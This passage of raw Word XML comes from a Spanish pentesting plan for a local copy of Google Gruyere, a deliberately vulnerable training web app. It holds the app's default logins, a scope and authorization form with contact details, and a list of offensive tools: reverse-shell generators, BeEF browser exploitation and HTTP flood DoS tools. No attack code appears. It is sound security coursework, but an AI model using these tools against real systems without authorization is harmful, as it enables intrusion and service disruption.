            <w:t>La empresa para que voy realizar esta prueba de pentesting es Google, concretamente el departamento de seguridad de codelabs, los encargados de realizar esta aplicación web: Google Gruyere.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6C18BC3F" w14:textId="71B70841" w:rsidR="0011413D" w:rsidRDefault="0011413D" w:rsidP="0011413D">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Esta parte de la empresa tiene 10 empleados, fuimos contactados por la gerente de seguridad, Eva Lorenzo Casado.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="15C495DC" w14:textId="3E197A7F" w:rsidR="0011413D" w:rsidRDefault="0011413D" w:rsidP="0011413D">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>En cuanto a la aplicación web, conta de esto usuario en la versión que nos proporciona Google, que es una versión para probar en una maquina local, y así que no haya problemas en la aplicación web, producidos colateralmente por el pentesting.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="727D35D9" w14:textId="22A7AF85" w:rsidR="0011413D" w:rsidRDefault="0011413D" w:rsidP="0011413D">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Esta aplicación trae estos usuarios y contraseñas:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="16054EDF" w14:textId="74F2ADCE" w:rsidR="0011413D" w:rsidRDefault="003203BB">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="22"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Nombre de usuario Administrador, contraseña secret.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1D02AA7B" w14:textId="22FDBAFC" w:rsidR="003203BB" w:rsidRDefault="003203BB">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="22"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Nombre de usuario cheddar, contraseña Orange</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7B350934" w14:textId="6D705D38" w:rsidR="003203BB" w:rsidRDefault="003203BB">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="22"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Nombre de usuario sardo, contraseña odras</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0AB52A41" w14:textId="6480D489" w:rsidR="003203BB" w:rsidRPr="0011413D" w:rsidRDefault="003203BB">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="22"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Nombre de usuario brie, contraseñabirebrie</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="13D28EB5" w14:textId="0FB9614A" w:rsidR="00713289" w:rsidRDefault="00713289" w:rsidP="000E194E">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="55D61BD0" w14:textId="65EE2CFE" w:rsidR="00713289" w:rsidRDefault="00713289">
          <w:pPr>
            <w:pStyle w:val="Ttulo2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="14"/>
            </w:numPr>
          </w:pPr>
          <w:bookmarkStart w:id="5" w:name="_Toc128034127"/>
          <w:r>
            <w:t>Planteamiento del problema</w:t>
          </w:r>
          <w:bookmarkEnd w:id="5"/>
        </w:p>
        <w:p w14:paraId="7D40F565" w14:textId="77777777" w:rsidR="00713289" w:rsidRPr="00713289" w:rsidRDefault="00713289" w:rsidP="00713289"/>
        <w:p w14:paraId="1F986EFC" w14:textId="77777777" w:rsidR="00713289" w:rsidRDefault="00713289" w:rsidP="00713289">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">La empresa Google y yo como Alesander S.L, llegamos a un acuerdo para realizar una prueba de pentesting a su página web, con motivo de comprobar la seguridad de esta </w:t>
          </w:r>
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:t>página, esta necesidad surge de tener que cumplir con la normativa europea GDPR que entró en vigor en mayo de 2018, y en España la Ley Orgánica 3/2018, de 5 de diciembre, de Protección de datos Personales y garantía de los derechos digitales.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="13DE8B38" w14:textId="4FDB70B0" w:rsidR="00713289" w:rsidRDefault="00713289" w:rsidP="00713289">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="307EE92E" w14:textId="0FC44A01" w:rsidR="00713289" w:rsidRDefault="00713289" w:rsidP="00713289"/>
        <w:p w14:paraId="7857B5FE" w14:textId="4B240606" w:rsidR="00713289" w:rsidRDefault="00713289">
          <w:pPr>
            <w:pStyle w:val="Ttulo2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="14"/>
            </w:numPr>
          </w:pPr>
          <w:bookmarkStart w:id="6" w:name="_Toc128034128"/>
          <w:r>
            <w:t>Objetivo general</w:t>
          </w:r>
          <w:bookmarkEnd w:id="6"/>
        </w:p>
        <w:p w14:paraId="4007E6FA" w14:textId="0A34D3A6" w:rsidR="00713289" w:rsidRDefault="00713289" w:rsidP="00713289">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="27A83E14" w14:textId="035DE46C" w:rsidR="00713289" w:rsidRPr="00713289" w:rsidRDefault="00713289" w:rsidP="00713289">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Realizar un pentesting a la aplicación web de Google Gruyere, utilizando las herramientas </w:t>
          </w:r>
          <w:r w:rsidR="005F05EB">
            <w:t>descritas continuación</w:t>
          </w:r>
          <w:r>
            <w:t>:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="57598036" w14:textId="77777777" w:rsidR="00713289" w:rsidRPr="00713289" w:rsidRDefault="00713289" w:rsidP="00713289"/>
        <w:p w14:paraId="6220778D" w14:textId="7A0D3D8E" w:rsidR="00675035" w:rsidRDefault="00675035">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="20"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Una máquina Kali Linux con la IP: 192.168.1.148.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="68FF689E" w14:textId="6273EB14" w:rsidR="00675035" w:rsidRDefault="00675035">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="20"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Programa para encontrar vulnerabilidades Acunetix.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="406D5F36" w14:textId="35996A01" w:rsidR="00675035" w:rsidRDefault="00675035">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="20"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Programa para encontrar vulnerabilidades Burp Suite, y usado también como pro</w:t>
          </w:r>
          <w:r w:rsidR="004041B8">
            <w:t>xy</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> de interceptación.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0EB6E1B0" w14:textId="5298794A" w:rsidR="00675035" w:rsidRDefault="00675035">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="20"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Programa para encontrar vulnerabilidades ZAP.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="44740204" w14:textId="48BB24FB" w:rsidR="00675035" w:rsidRDefault="00675035">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="20"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Skipish script para encontrar vulnerabilidades.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6CE193C3" w14:textId="1DAAD41C" w:rsidR="00675035" w:rsidRDefault="00675035">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="20"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Programa para reconocimiento de equipos en la red NMAP.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3D980453" w14:textId="4FFE06E5" w:rsidR="00675035" w:rsidRDefault="00675035">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="20"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Programa para reconocimiento de equipos en la red Netdiscover.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5F5B5103" w14:textId="6DA5574B" w:rsidR="00675035" w:rsidRDefault="00675035">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="20"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Programa para reconocimiento y análisis de equipos es la red Reconnoitre.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="614C9856" w14:textId="77777777" w:rsidR="00312E63" w:rsidRDefault="00312E63">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="20"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Ataque DoS HTTP flood, con Golang-httpflood y PyFlooder.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0C6820E7" w14:textId="1F7F4A94" w:rsidR="005544DE" w:rsidRDefault="005544DE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="20"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Netcat, programa para generar un socket para comunicarse con el equipo en donde corre la aplicación web.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="715CC436" w14:textId="374D3983" w:rsidR="005544DE" w:rsidRDefault="005544DE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="20"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Villain, programa para generar shells reversas y bind shells.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="28A41814" w14:textId="11BE5508" w:rsidR="005544DE" w:rsidRDefault="005544DE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="20"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Script de Python JS</w:t>
          </w:r>
          <w:r w:rsidR="002B2909">
            <w:t>sh</w:t>
          </w:r>
          <w:r>
            <w:t>ell, que tiene como propósito crear un Shell reversa con JavaScript, para poder tener control sobre el navegador.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="00E2334D" w14:textId="44EC6C1F" w:rsidR="0011413D" w:rsidRDefault="0011413D">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="20"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Beef-XSS, que es un framework de explotación del </w:t>
          </w:r>
          <w:r w:rsidR="00023E0C">
            <w:t>navegador</w:t>
          </w:r>
          <w:r>
            <w:t>.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4B2ED964" w14:textId="1E564EC7" w:rsidR="00023E0C" w:rsidRDefault="00023E0C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="20"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Shellereator, sirve para generar shells </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4A64F7A3" w14:textId="03C2C1F9" w:rsidR="005544DE" w:rsidRDefault="00713289" w:rsidP="005544DE">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Generar un informe</w:t>
          </w:r>
          <w:r w:rsidR="005F05EB">
            <w:t xml:space="preserve"> de auditoría</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> y documentación detallada sobre el pentesting, vulnerabilidades y como defenderse, procedimientos para </w:t>
          </w:r>
          <w:r w:rsidR="005F05EB">
            <w:t>acceder a</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> esas vulnerabilidades</w:t>
          </w:r>
          <w:r w:rsidR="005F05EB">
            <w:t>, escaneos de vulnerabilidades, instalación del contorno para realizar el pentesting.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="619832FD" w14:textId="44F4B477" w:rsidR="00F70AD3" w:rsidRDefault="00F70AD3" w:rsidP="005544DE">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Este informe de </w:t>
          </w:r>
          <w:r w:rsidR="00312E63">
            <w:t>auditoría</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> constará de dos partes, un informe ejecutivo y uno técnico.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="18FA60B2" w14:textId="08729F91" w:rsidR="00D20135" w:rsidRPr="000E194E" w:rsidRDefault="00D20135" w:rsidP="005544DE">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>También se realizará una memoria con todo el proceso.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5A42F3D4" w14:textId="6F961F0A" w:rsidR="00406981" w:rsidRDefault="00406981">
          <w:pPr>
            <w:pStyle w:val="Ttulo2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="14"/>
            </w:numPr>
          </w:pPr>
          <w:bookmarkStart w:id="7" w:name="_Toc128034129"/>
          <w:r>
            <w:t>Formulario de autorización de pentesting</w:t>
          </w:r>
          <w:r w:rsidR="000E194E">
            <w:t>.</w:t>
          </w:r>
          <w:bookmarkEnd w:id="7"/>
        </w:p>
        <w:p w14:paraId="6CB1AECD" w14:textId="77777777" w:rsidR="000E194E" w:rsidRPr="000E194E" w:rsidRDefault="000E194E" w:rsidP="000E194E"/>
        <w:p w14:paraId="07EBEE39" w14:textId="4D17E47A" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00406981">
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t>Cliente</w:t>
          </w:r>
          <w:r>
            <w:t>: Google.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="148D3AF8" w14:textId="28A4E839" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00406981">
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t>Nombre</w:t>
          </w:r>
          <w:r>
            <w:t>: Eva Lorenzo Casado.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6C1857E9" w14:textId="5F842866" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00406981">
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t>Puesto</w:t>
          </w:r>
          <w:r>
            <w:t>: Gerente del área de ciberseguridad.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6C0ECCAF" w14:textId="4EBC40B9" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00406981">
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t>Fecha</w:t>
          </w:r>
          <w:r>
            <w:t>: 25/02/2023</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="270BDA51" w14:textId="3D7FDD08" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:t>Autoriza a Alesander S.L para llevar a cabo actividades de verificación de seguridad de las aplicaciones y sistemas que se describirán a continuación:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6D4F5DFC" w14:textId="7B877372" w:rsidR="00406981" w:rsidRDefault="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Ámbitos de pruebas de penetración:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1664D859" w14:textId="77777777" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="590E09DE" w14:textId="476B9846" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
          <w:r>
            <w:t>Prueba de penetración en la aplicación web de Google Gruyere, esta prueba no será en el servidor si no será dada una versión local de esa máquina para poder hacer las pruebas sin que la web tenga algún tipo de problema, la máquina en que correrá este sistema será puesta por la empresa Alesander S.L.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="162CB4E7" w14:textId="05BD9E98" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
          <w:r>
            <w:t>Están es la IP y MAC con que llevaré a cabo la prueba:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0800CC79" w14:textId="35CC9298" w:rsidR="00406981" w:rsidRDefault="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Condiciones:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="042096E8" w14:textId="77777777" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="4618ED82" w14:textId="13A07636" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
          <w:r>
            <w:t>Las pruebas serán en la misma red de la máquina, con la aplicación web.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0DE3BE60" w14:textId="291851CC" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
          <w:r>
            <w:t>Se realizará una prueba de caja gris.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="62B18BC5" w14:textId="7149F2E8" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
          <w:r>
            <w:t>Se podrán realizar pruebas ilimitadas.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3CF8AA10" w14:textId="77777777" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="36847902" w14:textId="55DF309E" w:rsidR="00406981" w:rsidRDefault="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Planificación temporal:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6E5910EF" w14:textId="69EBA479" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="10119558" w14:textId="782F2E8F" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
          <w:r>
            <w:t>Tendremos un tiempo desde el 1 de febrero de 2023 hasta el 28 de febrero de 2023.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="451A2114" w14:textId="7202264A" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
          <w:r>
            <w:t>En cuanto a las horas, podrán realizarse a cualquier hora.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5783D340" w14:textId="77777777" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="402B3D65" w14:textId="0CFAEC23" w:rsidR="00406981" w:rsidRDefault="00A00634">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>T</w:t>
          </w:r>
          <w:r w:rsidR="00406981">
            <w:t>eléfonos de soporte en caso de algún problema:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1094752A" w14:textId="3711F9C4" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="47A7A773" w14:textId="5892CDCA" w:rsidR="00A00634" w:rsidRDefault="00A00634" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
          <w:r>
            <w:t>En caso del cliente:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="12EDA869" w14:textId="42627872" w:rsidR="00A00634" w:rsidRDefault="00A00634" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="56B37F03" w14:textId="27F50629" w:rsidR="00A00634" w:rsidRDefault="00A00634" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
          <w:r>
            <w:t>Eva Lorenzo Casado, 698456123.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7DFA12E1" w14:textId="7DC57BFA" w:rsidR="00A00634" w:rsidRDefault="00A00634" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Correo: </w:t>
          </w:r>
          <w:hyperlink r:id="rId18" w:history="1">
            <w:r w:rsidRPr="005D3CE1">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
              </w:rPr>
              <w:t>eva@gmail.com</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50E54A3E" w14:textId="1C322BF2" w:rsidR="00A00634" w:rsidRDefault="00A00634" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="4BCC9BC9" w14:textId="5DE528FE" w:rsidR="00A00634" w:rsidRDefault="00A00634" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
          <w:r>
            <w:t>En caso de la empresa:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3B6283F2" w14:textId="4D6CB56D" w:rsidR="00A00634" w:rsidRDefault="00A00634" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="5E79009F" w14:textId="7E39E2AF" w:rsidR="00A00634" w:rsidRDefault="00A00634" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
          </w:pPr>
          <w:r>
            <w:t>Alesander Martínez Seijo, 62207958.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0DBA5D4C" w14:textId="485991AA" w:rsidR="00A00634" w:rsidRDefault="00A00634" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Correo: </w:t>
          </w:r>
          <w:hyperlink r:id="rId19" w:history="1">
            <w:r w:rsidR="00D32284" w:rsidRPr="005D3CE1">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
              </w:rPr>
              <w:t>sanderfene21789@gmail.com</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F360F96" w14:textId="4800B3C6" w:rsidR="00A37E0C" w:rsidRDefault="00A37E0C" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="5DFD9B4E" w14:textId="653BDA26" w:rsidR="00A37E0C" w:rsidRDefault="00A37E0C" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="442CC357" w14:textId="0A1FE787" w:rsidR="00A37E0C" w:rsidRDefault="00A37E0C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="15"/>
            </w:numPr>
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
              <w:color w:val="auto"/>
              <w:u w:val="none"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
              <w:color w:val="auto"/>
              <w:u w:val="none"/>
            </w:rPr>
            <w:t xml:space="preserve">Documentación a entregar: </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0501E1C4" w14:textId="343EC6C3" w:rsidR="00D20135" w:rsidRDefault="00D20135" w:rsidP="00D20135">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
              <w:color w:val="auto"/>
              <w:u w:val="none"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="675C0745" w14:textId="272B90D2" w:rsidR="00D20135" w:rsidRPr="00A37E0C" w:rsidRDefault="00D20135" w:rsidP="00D20135">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
              <w:color w:val="auto"/>
              <w:u w:val="none"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
              <w:color w:val="auto"/>
              <w:u w:val="none"/>
            </w:rPr>
            <w:t xml:space="preserve">Se entregará la memoria con las pruebas realizadas, y un informe </w:t>
          </w:r>
          <w:r w:rsidR="002B2909">
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
              <w:color w:val="auto"/>
              <w:u w:val="none"/>
            </w:rPr>
            <w:t>ejecutivo</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
              <w:color w:val="auto"/>
              <w:u w:val="none"/>
            </w:rPr>
            <w:t xml:space="preserve"> y otro técnico.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="043C3E54" w14:textId="77777777" w:rsidR="00A37E0C" w:rsidRDefault="00A37E0C" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1068"/>
            <w:rPr>
              <w:rStyle w:val="Hipervnculo"/>
            </w:rPr>
          </w:pPr>
        </w:p>
